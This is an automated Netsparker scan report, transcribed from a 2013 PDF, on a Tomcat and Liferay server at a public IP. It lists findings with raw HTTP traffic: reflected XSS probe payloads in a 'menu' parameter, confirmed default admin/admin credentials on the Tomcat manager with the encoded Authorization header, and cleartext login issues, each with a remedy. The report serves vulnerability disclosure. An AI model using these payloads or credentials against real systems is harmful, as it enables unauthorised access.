Netsparker Scan Reportsourceforge.net/p/guse/bugs/78/attachment/161.74.91.78_8080.pdf · Inclusion,...
Transcript of Netsparker Scan Reportsourceforge.net/p/guse/bugs/78/attachment/161.74.91.78_8080.pdf · Inclusion,...
NETSPARKER SCAN REPORT SUMMARY
TARGET URL http://161.74.91.78:8080/
SCAN DATE 25/01/2013 08:27:47
REPORT DATE 25/01/2013 11:37:48
SCAN DURATION 03:00:42
TotalRequests42874
AverageSpeed
3.95req/sec.
47identified
6confirmed
0critical
35informational
SCAN SETTINGSENABLEDENGINES
Static Tests, Find Backup Files, SQL Injection,Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind CommandInjection, Local File Inclusion, Remote FileInclusion, Remote Code Evaluation, HTTP HeaderInjection, Open Redirection, Expression LanguageInjection
Authentication
Scheduled
VULNERABILITIESIMPORTANT9 %
MEDIUM2 %
LOW
15 %
INFORMATION
74%
1 / 35
VULNERABILITY SUMMARYURL Parameter Method Vulnerability Confirmed
/ E-mailAddressDisclosure
No
/dci_bridge_service/information menu GET Cross-siteScripting
No
menu GET [Possible]Cross-siteScripting
No
/docs ApacheCoyoteVersionDisclosure
No
/docs/appdev/processes.html [Possible]InternalPathLeakage(*nix)
No
/docs/building.html [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/docs/class-loader-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/cluster-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/config/cluster-receiver.html [Possible]InternalPathLeakage(*nix)
No
/docs/config/cluster-sender.html [Possible]InternalPathLeakage(*nix)
No
/docs/config/host.html [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/docs/config/http.html [Possible]InternalPathLeakage(*nix)
No
/docs/config/listeners.html [Possible]InternalPathLeakage(*nix)
No
/docs/html-manager-howto.html [Possible]InternalPathLeakage(Windows)
No
/docs/jasper-howto.html [Possible]InternalPathLeakage(*nix)
No
2 / 35
/docs/jndi-datasource-examples-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/logging.html [Possible]InternalPathLeakage(*nix)
No
/docs/manager-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/monitoring.html [Possible]InternalIPAddressLeakage
No
[Possible]InternalPathLeakage(*nix)
No
/docs/realm-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/RELEASE-NOTES.txt [Possible]InternalPathLeakage(*nix)
No
/docs/security-manager-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/setup.html [Possible]InternalPathLeakage(*nix)
No
/docs/ssl-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/virtual-hosting-howto.html [Possible]InternalPathLeakage(*nix)
No
/docs/windows-service-howto.html [Possible]InternalPathLeakage(Windows)
No
/examples/jsp/forward/forward.jsp InternalServerError
Yes
TomcatExceptionReportDisclosure
No
/examples/jsp/index.html DefaultTomcatPageIdentified
No
/examples/jsp/jsp2/el/basic-arithmetic.jsp CookieNotMarkedAsHttpOnly
Yes
/examples/jsp/sessions/carts.jsp [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
3 / 35
/examples/servlets/servlet/CookieExample [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/examples/servlets/servlet/RequestHeaderExample [Possible]InternalPathLeakage(*nix)
No
/examples/servlets/servlet/SessionExample [Possible]InternalPathLeakage(*nix)
No
[Possible]InternalPathLeakage(Windows)
No
/liferay-portal-6.1.0/image/ ForbiddenResource
Yes
/liferay-portal-6.1.0/web/guest/home PasswordTransmittedOverHTTP
Yes
AutoCompleteEnabled
Yes
/manager/ TomcatVersionDisclosure
No
/manager/status BasicAuthenticationoverClearText
Yes
WeakCredentialsIdentified
No
/RELEASE-NOTES.txt [Possible]InternalPathLeakage(*nix)
No
4 / 35
1 TOTALIMPORTANT
1. Cross-site ScriptingXSS(Cross-siteScripting)allowsanattackertoexecuteadynamicscript(Javascript, VbScript)inthecontextoftheapplication.Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/Javascript/VbScriptbythebrowser.
XSStargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'session,anattackermightattackanadministratortogainfullcontrolovertheapplication.
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSS,including:
Hi-jackingusers'activesession.Mountingphishingattacks.Interceptdataandperformman-in-the-middleattacks.
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTML,JavascriptorVbScript.Toavoidthis,outputshouldbeencodedaccordingtotheoutputlocationandcontext.ForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordingly.Encodingcangetverycomplexthereforeit'sstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-Cross-siteScripting.
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnellingPaper
ClassificationOWASPA2PCIv1.2-6.5.1PCIv2.0-6.5.7CWE-79CAPEC-19WASC-08
1.1. /dci_bridge_service/informationhttp://161.74.91.78:8080/dci_bridge_service/information?menu='%3E%3Cnet%20sparker=alert(0x000C36)%3E
ParametersParameter Type Value
menu GET '><net sparker=alert(0x000C36)>
Certainty
RequestGET /dci_bridge_service/information?menu='%3E%3Cnet%20sparker=netsparker(0x000C36)%3E HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/dci_bridge_service/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: CHAR(109)=Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 09:42:49 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=A7746A61AC33C1B620DE205CDA6AA8ED; Path=/dci_bridge_serviceContent-Length: 3550Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DCI BRIDGE</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css" media="screen">@import "tabs.css";</style> <styletype="text/css" media="screen">@import "style.css";</style> <script language="javascript" src="designe.js"> </script> <script type="text/javascript" src="tinybox.js"></script></head><script> var webapp="/dci_bridge_service"; var popUP_OK=""; var popUP_NO="";</script><body><a href="information?menu=main"><img src="imgs/banner.png" /></a><a href="conf"><img align="right"src="imgs/login.png" /></a><div id="header"> <ul id="primary"> <div id="header"> <ul id="primary"> <li><a href="information?menu=local"><imgsrc="imgs/middlewares/local.png" /><br />Local</a></li> <li><a href="information?menu=glite"><img src="imgs/middlewares/glite.png" /><br />gLite</a></li> <li><a href="information?menu=boinc"><img src="imgs/middlewares/boinc.png" /><br />BOINC</a></li> <li><a href="information?menu=gt2"><img src="imgs/middlewares/gt2.png" /><br />GT-2</a></li> …
5 / 35
1 TOTALIMPORTANT
CONFIRMED
1
2. Basic Authentication over Clear TextNetsparkeridentifiedthattheapplicationisusingBasicAuthenticationoverHTTP.BasicAuthenticationsendsusernameandpasswordinplaintext.
ImpactIfanattackercanintercepttrafficonthenetwork,he/shemightbeabletostealtheuserscredentials.
Actions to Take1. Seetheremedyforsolution.2. MoveallofyourdirectorieswhichrequireauthenticationtobeservedonlyoverHTTPSanddisableanyaccesstothesepagesoverHTTP.
RemedyAllsensitivedatashouldbetransferredonlyoverHTTPS.
ClassificationOWASPA9PCIv1.2-6.5.9PCIv2.0-6.5.4CWE-319CAPEC-65WASC-04
2.1. /manager/status CONFIRMEDhttp://161.74.91.78:8080/manager/status
RequestGET /manager/status HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 401 UnauthorizedCache-Control: no-cacheDate: Fri, 25 Jan 2013 08:27:27 GMTPragma: No-cacheTransfer-Encoding: chunkedServer: Apache-Coyote/1.1WWW-Authenticate: Basic realm="Tomcat Manager Application"Set-Cookie: JSESSIONID=4ADB5E07C3FFBE7123534CBBDE237E4A; Path=/manager; HttpOnlyContent-Type: text/htmlExpires: Thu, 01 Jan 1970 00:00:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN…
6 / 35
1 TOTALIMPORTANT
CONFIRMED
1
3. Password Transmitted Over HTTPNetsparkeridentifiedthatpassworddataissentoverHTTP.
ImpactIfanattackercaninterceptnetworktraffiche/shecanstealuserscredentials.
Actions to Take1. Seetheremedyforsolution.2. MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP.
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTP.FormsshouldbeservedoverHTTPS.AllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS.
ClassificationOWASPA9PCIv1.2-6.5.9PCIv2.0-6.5.4CWE-319CAPEC-65WASC-04
3.1. /liferay-portal-6.1.0/web/guest/home CONFIRMEDhttp://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=max..
Form target actionhttp://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_auth=BRu3JgId&p_p_id=58&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin&_58_doActionAfterLogin=false
RequestGET /liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/liferay-portal-6.1.0/c/portal/login?p_l_id=10231Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 08:32:28 GMTServer: Apache-Coyote/1.1Liferay-Portal: Liferay Portal Community Edition 6.1.0 CE (Paton / Build 6100 / January 6, 2012)ETag: "70403480"Content-Encoding: Content-Length: 4840Content-Type: text/html;charset=UTF-8
<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"> <head> <title>Welcome - Liferay</title> <meta content="text/html; charset=UTF-8" http-equiv="content-type" /> <linkhref="/liferay-portal-6.1.0/html/themes/classic/images/favicon.ico" rel="Shortcut Icon" /> <link href="http://localhost:8080/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" rel="canonical" /> <link href="http://localhost:8080/ar/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ar-SA" rel="alternate" /> <linkhref="http://localhost:8080/eu/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="eu-ES" rel="alternate" /> <link href="http://localhost:8080/bg/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="bg-BG" rel="alternate" /> <linkhref="http://localhost:8080/ca/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-AD" rel="alternate" /> <link href="http://localhost:8080/ca_ES/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-ES" rel="alternate" /> <linkhref="http://localhost:8080/zh/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="zh-CN" rel="alternate" /> <l…
7 / 35
1 TOTALIMPORTANT
4. Weak Credentials IdentifiedNetsparkeridentifiedaweakusername/passwordinthisresource.
ImpactDependingonthenatureofthepassword-protectedresource,anattackercanmountoneormoreofthefollowingtypesofattacks:
Accessthecontentsofthepassword-protectedresources.Accesspassword-protectedadministrativemechanismssuchas"dashboard","managementconsole"and"adminpanel"potentiallyprogressingtogainfullcontroloftheapplication.
RemedyDonotuseweakpasswordswhichareshort,default,commonoreasytoguess.Implementastrongpasswordpolicy.
External ReferencesGuidetoAuthentication
ClassificationOWASPA6PCIv1.2-6.5.8PCIv2.0-6.5.8CWE-521CAPEC-16WASC-15
4.1. /manager/statushttp://161.74.91.78:8080/manager/status
Usernameadmin
Passwordadmin
Certainty
RequestGET /manager/status HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflate,gzip, deflateAuthorization: Basic YWRtaW46YWRtaW4=Host: 161.74.91.78:8080Cookie: JSESSIONID=4ADB5E07C3FFBE7123534CBBDE237E4A
ResponseHTTP/1.1 200 OKCache-Control: no-cacheDate: Fri, 25 Jan 2013 08:27:35 GMTPragma: No-cacheTransfer-Encoding: chunkedServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=CC36BB5DEA0B9E05CB3B1D437C24C812; Path=/manager; HttpOnlyContent-Type: text/html;charset=utf-8Expires: Thu, 01 Jan 1970 00:00:00 GMT
<html><head><style>H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;} table { width: 100%; } td.page-title { text-align: center;vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: white; color: black; } td.title { text-align: left; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-style:italic; font-weight: bold; background: #D2A41C; } td.header-left { text-align: left; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: #FFDC75; } td.header-center { text-align: center; vertical-align: top; font-family:sans-serif,Tahoma,Arial; font-weight: bold; background: #FFDC75; }td.row-left { text-align: left; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; color: black; } td.row-center { text-align: center; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; color: black; } td.row-right { text-align: right; vertical-align: middle; font-family:sans-serif,Tahoma,Arial; …
8 / 35
1 TOTALMEDIUM
5. [Possible] Cross-site ScriptingXSS(Cross-siteScripting)allowsanattackertoexecuteadynamicscript(Javascript, VbScript)inthecontextoftheapplication.Thisallowsseveraldifferentattackopportunities,mostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuser'scredentials.ThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTML/Javascript/VbScriptbythebrowser.
NetsparkerbelievesthatthereisaXSS(Cross-siteScripting)inhereitcould not confirm it.WestronglyrecommendinvestigatingtheissuemanuallytoensurethatitisanXSS(Cross-siteScripting)andneedstobeaddressed.
XSStargetstheusersoftheapplicationinsteadoftheserver.Althoughthisisalimitation,sinceitallowsattackerstohijackotherusers'session,anattackermightattackanadministratortogainfullcontrolovertheapplication.
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSS,including:
Hi-jackingusers'activesessionChangingthelookofthepagewithinthevictimsbrowser.Mountingasuccessfulphishingattack.Interceptdataandperformman-in-the-middleattacks.
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTML,JavascriptorVbScript.Toavoidthis,allinputandoutputfromtheapplicationshouldbefiltered/encoded.Outputshouldbefiltered/encodedaccordingtotheoutputformatandlocation.
Thereareanumberofpre-defined,wellstructuredwhite-listlibrariesavailableformanydifferentenvironments,goodexamplesoftheseinclude,OWASPReformandMicrosoftAntiCross-siteScriptinglibrariesaregoodexamples.
Remedy References[ASP.NET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnellingPaper
ClassificationOWASPA2PCIv1.2-6.5.1PCIv2.0-6.5.7CWE-79CAPEC-19WASC-08
5.1. /dci_bridge_service/informationhttp://161.74.91.78:8080/dci_bridge_service/information?menu='%22--%3E%3C/style%3E%3C/script%3E%3Csc..
ParametersParameter Type Value
menu GET '"--></style></script><script>alert(0x000BFD)</script>
Certainty
RequestGET /dci_bridge_service/information?menu='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000BFD)%3C/script%3E HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/dci_bridge_service/Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: CHAR(109)=Accept-Encoding: gzip, deflate
9 / 35
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 09:39:29 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=B49E5F7DF0937D7D9AA7DDD5F1F7DE68; Path=/dci_bridge_serviceContent-Length: 3596Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DCI BRIDGE</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css" media="screen">@import "tabs.css";</style> <styletype="text/css" media="screen">@import "style.css";</style> <script language="javascript" src="designe.js"> </script> <script type="text/javascript" src="tinybox.js"></script></head><script> var webapp="/dci_bridge_service"; var popUP_OK=""; var popUP_NO="";</script><body><a href="information?menu=main"><img src="imgs/banner.png" /></a><a href="conf"><img align="right"src="imgs/login.png" /></a><div id="header"> <ul id="primary"> <div id="header"> <ul id="primary"> <li><a href="information?menu=local"><imgsrc="imgs/middlewares/local.png" /><br />Local</a></li> <li><a href="information?menu=glite"><img src="imgs/middlewares/glite.png" /><br />gLite</a></li> <li><a href="information?menu=boinc"><img src="imgs/middlewares/boinc.png" /><br />BOINC</a></li> <li><a href="information?menu=gt2"><img src="imgs/middlewares/gt2.png" /><br />GT-2</a></li> …
10 / 35
1 TOTALLOW
CONFIRMED
1
6. Internal Server ErrorTheServerrespondedwithanHTTPstatus500.Thisindicatesthatthereisaserver-sideerror.Reasonsmayvary.Thebehaviorshouldbeanalysedcarefully.IfNetsparkerisabletofindasecurityissueinthesameresourceitwillreportthisasaseparatevulnerability.
ImpactTheimpactmayvarydependingonthecondition.Generallythisindicatespoorcodingpractices,notenougherrorchecking,sanitizationandwhitelisting.HowevertheremightbeabiggerissuesuchasSQLInjection.Ifthat'sthecaseNetsparkerwillcheckforotherpossibleissuesandreportthemseparately.
RemedyAnalysethisissueandreviewtheapplicationcodeinordertohandleunexpectederrors,thisshouldbeagenericpracticewhichdoesnotdisclosefurtherinformationuponanerror.Allerrorsshouldbehandledserversideonly.
6.1. /examples/jsp/forward/forward.jsp CONFIRMEDhttp://161.74.91.78:8080/examples/jsp/forward/forward.jsp
RequestGET /examples/jsp/forward/forward.jsp HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/jsp/index.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 500 Internal Server ErrorConnection: closeDate: Fri, 25 Jan 2013 08:28:05 GMTServer: Apache-Coyote/1.1Content-Length: 2699Content-Type: text/html;charset=utf-8
<html><head><title>Apache Tomcat/6.0.35 - Error repor…
11 / 35
1 TOTALLOW
CONFIRMED
1
7. Auto Complete Enabled"AutoComplete"wasenabledinoneormoreoftheformfields.Thesewereeither"password"fieldsorimportantfieldssuchas"CreditCard".
ImpactDataenteredinthesefieldswillbecachedbythebrowser.Anattackerwhocanaccessthevictim'sbrowsercouldstealthisinformation.Thisisespeciallyimportantiftheapplicationiscommonlyusedinsharedcomputerssuchascybercafesorairportterminals.
RemedyAddtheattributeautocomplete="off"totheformtagortoindividual"input"fields.
Actions to Take1. Seetheremedyforthesolution.2. Findallinstancesofinputswhichstoreprivatedataanddisableautocomplete.Fieldswhichcontaindatasuchas"CreditCard"or"CCV"typedatashouldnotbecached.Youcanallowtheapplicationtocacheusernamesandrememberpasswords,however,inmostcasesthisisnotrecommended.
3. Re-scantheapplicationafteraddressingtheidentifiedissuestoensurethatallofthefixeshavebeenappliedproperly.
Required Skills for Successful ExploitationDumpingalldatafromabrowsercanbefairlyeasyandthereexistanumberofautomatedtoolstoundertakethis.Wheretheattackercannotdumpthedata,he/shecouldstillbrowsetherecentlyvisitedwebsitesandactivatetheauto-completefeaturetoseepreviouslyenteredvalues.
External ReferencesUsingAutoCompleteinHTMLForms
ClassificationCWE-16WASC-15
7.1. /liferay-portal-6.1.0/web/guest/home CONFIRMEDhttp://161.74.91.78:8080/liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=max..
Identified Field Name_58_login
RequestGET /liferay-portal-6.1.0/web/guest/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/liferay-portal-6.1.0/c/portal/login?p_l_id=10231Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=70C60A1A8A9C234A451A8DCB1F4B4F8C; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 08:32:28 GMTServer: Apache-Coyote/1.1Liferay-Portal: Liferay Portal Community Edition 6.1.0 CE (Paton / Build 6100 / January 6, 2012)ETag: "70403480"Content-Encoding: Content-Length: 4840Content-Type: text/html;charset=UTF-8
<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"> <head> <title>Welcome - Liferay</title> <meta content="text/html; charset=UTF-8" http-equiv="content-type" /> <linkhref="/liferay-portal-6.1.0/html/themes/classic/images/favicon.ico" rel="Shortcut Icon" /> <link href="http://localhost:8080/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" rel="canonical" /> <link href="http://localhost:8080/ar/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ar-SA" rel="alternate" /> <linkhref="http://localhost:8080/eu/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="eu-ES" rel="alternate" /> <link href="http://localhost:8080/bg/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="bg-BG" rel="alternate" /> <linkhref="http://localhost:8080/ca/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-AD" rel="alternate" /> <link href="http://localhost:8080/ca_ES/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="ca-ES" rel="alternate" /> <linkhref="http://localhost:8080/zh/liferay-portal-6.1.0/home?p_p_id=58&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&saveLastPath=0&_58_struts_action=%2Flogin%2Flogin" hreflang="zh-CN" rel="alternate" /> <l…
12 / 35
1 TOTALLOW
CONFIRMED
1
8. Cookie Not Marked As HttpOnlyCookiewasnotmarkedasHTTPOnly.HTTPOnlycookiescannotbereadbyclient-sidescriptsthereforemarkingacookieasHTTPOnlycanprovideanadditionallayerofprotectionagainstCross-siteScriptingattacks.
ImpactDuringaCross-siteScriptingattackanattackermighteasilyaccesscookiesandhijackthevictim'ssession.
Actions to Take1. Seetheremedyforsolution2. ConsidermarkingallofthecookiesusedbytheapplicationasHTTPOnly.(After these changes javascript code will not be able to read cookies.)
RemedyMarkthecookieasHTTPOnly.ThiswillbeanextralayerofdefenceagainstXSS.HoweverthisisnotasilverbulletandwillnotprotectthesystemagainstCross-siteScriptingattacks.AnattackercanuseatoolsuchasXSSTunneltobypassHTTPOnlyprotection.
External ReferencesOWASPHTTPOnlyCookiesMSDN-ASP.NETHTTPOnlyCookies
ClassificationCWE-16CAPEC-107WASC-15
8.1. /examples/jsp/jsp2/el/basic-arithmetic.jsp CONFIRMEDhttp://161.74.91.78:8080/examples/jsp/jsp2/el/basic-arithmetic.jsp
Identified CookieJSESSIONID
RequestGET /examples/jsp/jsp2/el/basic-arithmetic.jsp HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/jsp/index.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 08:27:40 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; Path=/examplesContent-Length: 2152Content-Type: text/html
<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with thi…
13 / 35
1 TOTALLOW
9. Tomcat Version DisclosureNetsparkeridentifiedthatthetargetwebserverisdisclosingtheTomcatversioninitsHTTPresponse.ThisinformationmighthelpanattackergainagreaterunderstandingofthesystemsinuseandpotentiallydevelopfurtherattackstargetedatthespecificversionofTomcat.
ImpactAnattackermightusethedisclosedinformationtoharvestspecificsecurityvulnerabilitiesfortheversionidentified.
RemedyConfigureyourwebservertopreventinformationleakagefromtheX-Powered-ByheaderofitsHTTPresponse.
Remedy ReferencesOWASPSecuringTomcat
ClassificationOWASPA6PCIv1.2-6.5.6CWE-200CAPEC-170
9.1. /manager/http://161.74.91.78:8080/manager/
Extracted Version6.0.35
Certainty
RequestGET /manager/ HTTP/1.1Cache-Control: no-cacheAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 404 Not FoundDate: Fri, 25 Jan 2013 08:27:27 GMTServer: Apache-Coyote/1.1Content-Length: 979Content-Type: text/html;charset=utf-8
